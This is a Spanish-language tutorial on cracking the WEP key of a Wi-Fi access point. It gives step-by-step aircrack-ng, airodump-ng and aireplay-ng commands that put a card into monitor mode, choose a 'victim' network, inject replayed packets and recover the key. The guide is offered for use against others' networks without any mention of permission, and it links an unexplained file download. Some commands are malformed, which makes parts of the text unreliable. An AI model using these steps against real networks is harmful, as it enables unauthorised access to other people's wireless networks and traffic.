En este tutorial, les muestro como crackear un punto de acceso Wi-Fi con cifrado WEP.
Para poder realizar el crackeo, deben tener:
PC con una tarjeta de red inalambrica.
Live CD de Ubuntu. (Desde la 8.04).
Descargar estos archivos: http://www.megaupload.com/?d=0AZRGWGS

Primero deben arrancar la PC desde el Live CD
Después, instalar IW, luego Aircrack-ng.
Descubrimos el nombre de nuestra tarjeta de red escribiendo en la consola
sudo su iwconfig
Nos aparecera el nombre de nuestra tarjeta inalambrica o wireless en este caso es wlan0, sin embargo puede ser ath0 o eth1 siempre cambia, dependiendo del fabricante de nuestra tarjeta de red.
Ahora para saber nuestra MAC ID
ifconfig
Tomamos nota de nuestra MAC
Siempre va a ser asi: ??-??-??-??-??-??
Ahora empezamos el proceso de crackeo:
En la consola, escribimos:
airmon-ng start (nombre de nuestro adaptador)
Ejemplo:
$airmon-ng start wlan0
Esto nos va a crear un monitor de red en mon0
Ahora buscamos las redes que estan a nuestro alcance para elejir una victima
en la consola escribimos:
airodump-ng mon0
Seleccionamos una red, nos fijamos en que canal (channel) esta, tomamos nota de su ESSID y su BSSID
ahora empezamos a capturar paquetes de datos de un canal especifico:
Le damos Ctrl+C para finalizar el proceso anterior
airodump-ng -c (canal) -w (nombre del archivo captura) mon0
Ejemplo:
$airodump-ng -c 6 -w captura mon0
Des esta manera estamos trabajando en el canal 6 y estamos guardando los datos en un archivo llamado captura.cap
Con este proceso trabajando, abrimos otra consola y escribimos
sudo su aireplay-ng -1 6000 -q 10 -o 1 -e (ESSID de la victima) -a (MAC de nuestra victima o BSSID) -h (nuestra MAC) mon0
Ejemplo:
aireplay-ng -1 6000 -q 10 -o 1 -e MijailRV -a 00:14:78:EB:35:66 -h 00:18:E7:76:1C:21 mon0
y damos el golpe final abriendo otra consola mientras los otros 2 procesos siguen trabajando y colocamos:
sudo su aireplay -3 -b (MAC de la victima o BSSID) -h (Nuestra MAC) mon0
Ejemplo:
aireplay -3 -b 00:14:78:EB:35:66 -h 00:18:E7:76:1C:21 mon0
Ahora lo que nos toca es esperar, tener al menos 30.000 paquetes de datos obtenidos, en algunos casos se necesitaran mas, por lo que les recomiendo que no detengan los procesos hasta que tengan una cantidad mayor a 150.000.
Unavez tengamos esa cantidad de paquetes de datos, vamos a empezar el crackeo.
Abrimos una nueva consola
sudo su aircrack-ng *.cap
Y empieza el proceso para buscar la contraseña
en algunos segundos (o minutos) obtendremos la clave WEP